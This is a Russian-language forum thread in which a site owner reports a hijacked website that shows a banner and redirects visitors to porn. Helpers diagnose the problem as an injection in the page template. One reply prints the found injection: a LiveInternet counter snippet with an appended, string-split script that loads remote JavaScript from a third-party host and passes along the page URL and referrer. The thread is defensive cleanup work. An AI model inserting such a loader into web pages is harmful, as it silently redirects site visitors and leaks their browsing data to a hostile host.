Перейти к публикации

Не понятное с сайтом, может вскрыли?


Рекомендованные сообщения

с www.fermer02.ru чтото не понятное твориться, пользователи жалуются что баннер проскакивает, вроде вскрыли и какой то скрипт воткнули, прошу посмотреть и подсказать в чем может быть проблема...

Ссылка на сообщение
Поделиться на других сайтах

Прямых зловредных кодов на странице нет, но сайт перекидывает на порно, и проблема есть, поэтому удаляйте все сторонние JS коды, реклама, флешки и прочее.

Ссылка на сообщение
Поделиться на других сайтах

скрины этих скриптов, где сидят не могу понять, вроде изрыл, предположительно на форуме гдето.... :( кто подскажет чем их найти, поиск по коду не чего не дает

Clipboard022222222222222.jpg

Clipboard0444.jpg

Clipboard06666.jpg

Изменено пользователем rbhosting
Ссылка на сообщение
Поделиться на других сайтах

О чем я и говорю, зловредный код, у вас во вставленном коде счетчика

 <!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click;fermer_all' "+
"target=_blank><img src='http://counter.yadro.ru/hit;fermer_all?t18.15;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
var lankru_html = '';lankru_html += '<scr' + 'ipt language="JavaSc' + 'ript" ';
lankru_html += 'src="http://kn' + 'alru.ru/js.php?id=32240';
lankru_html += '&dd=3&url=' + encodeURIComponent(document.location);
lankru_html += '&ref=' + encodeURIComponent(document.referrer);
lankru_html += '&rnd=' + Math.random() + '"></scr' + 'ipt>';document.write(lankru_html);
//--></script><!--/LiveInternet-->
[/code]

Ссылка на сообщение
Поделиться на других сайтах

все устранил спасибо, а как теперь узнать каким образом его туда воткнули, где может быть дырка?

где он у вас стоял? в шаблоне? смотрите тех кто имеет доступ установке этого кода. Если стояло в шаблоне, значит возможно уязвим ваш доступ по FTP.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...